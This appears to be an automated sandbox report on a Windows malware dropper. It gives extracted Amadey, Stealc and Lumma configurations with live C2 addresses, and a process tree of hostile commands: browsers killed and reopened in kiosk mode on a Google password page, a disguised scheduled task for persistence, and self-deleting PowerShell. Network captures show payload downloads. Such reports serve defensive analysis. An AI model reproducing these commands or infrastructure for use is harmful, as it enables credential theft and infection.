Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    22-12-2024 02:28

General

  • Target

    bc240f565f4a4aab03cdf04b6ae4522179347145e338ef33df918e741afc5ebb.exe

  • Size

    3.1MB

  • MD5

    aefbd9e285960b704524b4c33b0c9567

  • SHA1

    688eb719525b89f93db7d22bcbae38a13e7a973b

  • SHA256

    bc240f565f4a4aab03cdf04b6ae4522179347145e338ef33df918e741afc5ebb

  • SHA512

    9186ca00f1451b750f59bc999e696964866639a06018e4ad241dd5ddf85550ffdd370d91e72f45a04644f555c150021383e16b29f7c0c27cb8b7cf9465e0ad8f

  • SSDEEP

    49152:iIUtVtTZ0pIj3/bL4zoK79ucME+bkhG+WA73nilkwo:iIkVtTZ0pIj3vK79ucL+b9A73R

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • XMRig Miner payload 10 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 20 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 34 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bc240f565f4a4aab03cdf04b6ae4522179347145e338ef33df918e741afc5ebb.exe
    "C:\Users\Admin\AppData\Local\Temp\bc240f565f4a4aab03cdf04b6ae4522179347145e338ef33df918e741afc5ebb.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2916
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Users\Admin\AppData\Local\Temp\1019835001\ac7623e0c4.exe
        "C:\Users\Admin\AppData\Local\Temp\1019835001\ac7623e0c4.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2024
      • C:\Users\Admin\AppData\Local\Temp\1019836001\7cfad91fc9.exe
        "C:\Users\Admin\AppData\Local\Temp\1019836001\7cfad91fc9.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1524
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1892
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2060
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1292
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:760
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3036
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1036
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
            5⤵
            • Checks processor information in registry
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:2296
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2296.0.1404455840\1731484669" -parentBuildID 20221007134813 -prefsHandle 1236 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {642f6ec7-9cae-4690-81fc-76e89f092ecb} 2296 "\\.\pipe\gecko-crash-server-pipe.2296" 1336 fdd9b58 gpu
              6⤵
                PID:1808
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2296.1.1516400380\477590206" -parentBuildID 20221007134813 -prefsHandle 1516 -prefMapHandle 1496 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a725f10-bca8-4577-ad7a-a2555a04f807} 2296 "\\.\pipe\gecko-crash-server-pipe.2296" 1544 42fbc58 socket
                6⤵
                  PID:2768
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2296.2.1935291538\1541497046" -childID 1 -isForBrowser -prefsHandle 2024 -prefMapHandle 2020 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {65e42d31-60e9-4c8c-ac5c-86a37a758a71} 2296 "\\.\pipe\gecko-crash-server-pipe.2296" 2036 19a8d758 tab
                  6⤵
                    PID:2424
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2296.3.2112403813\1832497782" -childID 2 -isForBrowser -prefsHandle 2660 -prefMapHandle 2656 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b871d18b-51de-4178-9d8c-779050455489} 2296 "\\.\pipe\gecko-crash-server-pipe.2296" 2672 13649658 tab
                    6⤵
                      PID:912
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2296.4.1327232127\99305627" -childID 3 -isForBrowser -prefsHandle 3692 -prefMapHandle 3684 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {faf45c3e-aac6-4bd4-8a42-06dedccf6ec6} 2296 "\\.\pipe\gecko-crash-server-pipe.2296" 3704 1edd1e58 tab
                      6⤵
                        PID:2540
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2296.5.1583383412\1572636511" -childID 4 -isForBrowser -prefsHandle 3844 -prefMapHandle 3848 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cdf9167f-89c1-4e16-afe1-f30062fe38ba} 2296 "\\.\pipe\gecko-crash-server-pipe.2296" 3832 1edd0658 tab
                        6⤵
                          PID:1380
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2296.6.1957647338\148252624" -childID 5 -isForBrowser -prefsHandle 4008 -prefMapHandle 4012 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {89ff248d-7985-4a29-b4c4-900a77f93718} 2296 "\\.\pipe\gecko-crash-server-pipe.2296" 3996 1edcf158 tab
                          6⤵
                            PID:1780
                    • C:\Users\Admin\AppData\Local\Temp\1019837001\191490ec7b.exe
                      "C:\Users\Admin\AppData\Local\Temp\1019837001\191490ec7b.exe"
                      3⤵
                      • Modifies Windows Defender Real-time Protection settings
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Windows security modification
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:408
                    • C:\Users\Admin\AppData\Local\Temp\1019838001\aba28f5646.exe
                      "C:\Users\Admin\AppData\Local\Temp\1019838001\aba28f5646.exe"
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:1012
                      • C:\Windows\system32\cmd.exe
                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                        4⤵
                        • Loads dropped DLL
                        PID:1964
                        • C:\Windows\system32\mode.com
                          mode 65,10
                          5⤵
                            PID:780
                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                            7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1856
                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                            7z.exe e extracted/file_7.zip -oextracted
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:908
                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                            7z.exe e extracted/file_6.zip -oextracted
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:608
                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                            7z.exe e extracted/file_5.zip -oextracted
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1952
                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                            7z.exe e extracted/file_4.zip -oextracted
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2908
                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                            7z.exe e extracted/file_3.zip -oextracted
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2988
                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                            7z.exe e extracted/file_2.zip -oextracted
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1856
                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                            7z.exe e extracted/file_1.zip -oextracted
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:608
                          • C:\Windows\system32\attrib.exe
                            attrib +H "in.exe"
                            5⤵
                            • Views/modifies file attributes
                            PID:780
                          • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                            "in.exe"
                            5⤵
                            • Executes dropped EXE
                            PID:2988
                            • C:\Windows\system32\attrib.exe
                              attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                              6⤵
                              • Views/modifies file attributes
                              PID:1880
                            • C:\Windows\system32\attrib.exe
                              attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                              6⤵
                              • Views/modifies file attributes
                              PID:1896
                            • C:\Windows\system32\schtasks.exe
                              schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                              6⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:1524
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell ping 127.0.0.1; del in.exe
                              6⤵
                              • System Network Configuration Discovery: Internet Connection Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1648
                              • C:\Windows\system32\PING.EXE
                                "C:\Windows\system32\PING.EXE" 127.0.0.1
                                7⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:3148
                      • C:\Users\Admin\AppData\Local\Temp\1019839001\ef0449806c.exe
                        "C:\Users\Admin\AppData\Local\Temp\1019839001\ef0449806c.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3592
                      • C:\Users\Admin\AppData\Local\Temp\1019840001\97466ab734.exe
                        "C:\Users\Admin\AppData\Local\Temp\1019840001\97466ab734.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of FindShellTrayWindow
                        PID:3844
                        • C:\Users\Admin\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                          "C:\Users\Admin\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
                          4⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:3912
                      • C:\Users\Admin\AppData\Local\Temp\1019841001\df1fc80896.exe
                        "C:\Users\Admin\AppData\Local\Temp\1019841001\df1fc80896.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Adds Run key to start application
                        • Drops file in Program Files directory
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4040
                        • C:\Program Files\Windows Media Player\graph\graph.exe
                          "C:\Program Files\Windows Media Player\graph\graph.exe"
                          4⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2624
                      • C:\Users\Admin\AppData\Local\Temp\1019842001\64f8e9067b.exe
                        "C:\Users\Admin\AppData\Local\Temp\1019842001\64f8e9067b.exe"
                        3⤵
                          PID:3388
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {4B829401-F28F-40D4-943C-2212B599566B} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]
                      1⤵
                      • Loads dropped DLL
                      PID:3176
                      • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                        C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3208
                        • C:\Windows\explorer.exe
                          explorer.exe
                          3⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3240
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          3⤵
                          • Drops file in System32 directory
                          • System Network Configuration Discovery: Internet Connection Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3284
                          • C:\Windows\system32\PING.EXE
                            "C:\Windows\system32\PING.EXE" 127.1.10.1
                            4⤵
                            • System Network Configuration Discovery: Internet Connection Discovery
                            • Runs ping.exe
                            PID:3368

                    Network

                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 4
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:29:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 156
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:29:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:29:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:30:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:30:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:30:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:31:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      GET
                      http://185.215.113.16/luma/random.exe
                      skotes.exe
                      Remote address:
                      185.215.113.16:80
                      Request
                      GET /luma/random.exe HTTP/1.1
                      Host: 185.215.113.16
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:29:04 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1854976
                      Last-Modified: Sun, 22 Dec 2024 02:27:11 GMT
                      Connection: keep-alive
                      ETag: "676778ff-1c4e00"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://185.215.113.16/steam/random.exe
                      skotes.exe
                      Remote address:
                      185.215.113.16:80
                      Request
                      GET /steam/random.exe HTTP/1.1
                      Host: 185.215.113.16
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:29:46 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 2957824
                      Last-Modified: Sun, 22 Dec 2024 02:27:22 GMT
                      Connection: keep-alive
                      ETag: "6767790a-2d2200"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://185.215.113.16/well/random.exe
                      skotes.exe
                      Remote address:
                      185.215.113.16:80
                      Request
                      GET /well/random.exe HTTP/1.1
                      Host: 185.215.113.16
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:30:01 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 965120
                      Last-Modified: Sun, 22 Dec 2024 02:24:49 GMT
                      Connection: keep-alive
                      ETag: "67677871-eba00"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://185.215.113.16/off/random.exe
                      skotes.exe
                      Remote address:
                      185.215.113.16:80
                      Request
                      GET /off/random.exe HTTP/1.1
                      Host: 185.215.113.16
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sun, 22 Dec 2024 02:30:27 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 2858496
                      Last-Modified: Sun, 22 Dec 2024 02:25:24 GMT
                      Connection: keep-alive
                      ETag: "67677894-2b9e00"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://185.215.113.206/
                      ac7623e0c4.exe
                      Remote address:
                      185.215.113.206:80
                      Request
                      GET / HTTP/1.1
                      Host: 185.215.113.206
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Sun, 22 Dec 2024 02:30:02 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-ru
                      POST
                      http://185.215.113.206/c4becf79229cb002.php
                      ac7623e0c4.exe
                      Remote address:
                      185.215.113.206:80
                      Request
                      POST /c4becf79229cb002.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECB
                      Host: 185.215.113.206
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Sun, 22 Dec 2024 02:30:02 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-us
                      DNS
                      spocs.getpocket.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      spocs.getpocket.com
                      IN A
                      Response
                      spocs.getpocket.com
                      IN CNAME
                      prod.ads.prod.webservices.mozgcp.net
                      prod.ads.prod.webservices.mozgcp.net
                      IN A
                      34.117.188.166
                    • flag-us
                      DNS
                      getpocket.cdn.mozilla.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      getpocket.cdn.mozilla.net
                      IN A
                      Response
                      getpocket.cdn.mozilla.net
                      IN CNAME
                      getpocket-cdn.prod.mozaws.net
                      getpocket-cdn.prod.mozaws.net
                      IN CNAME
                      prod.pocket.prod.cloudops.mozgcp.net
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN A
                      34.120.5.221
                    • flag-us
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN A
                      Response
                      youtube.com
                      IN A
                      172.217.18.206
                    • flag-us
                      DNS
                      prod.ads.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.ads.prod.webservices.mozgcp.net
                      IN A
                      Response
                      prod.ads.prod.webservices.mozgcp.net
                      IN A
                      34.117.188.166
                    • flag-us
                      DNS
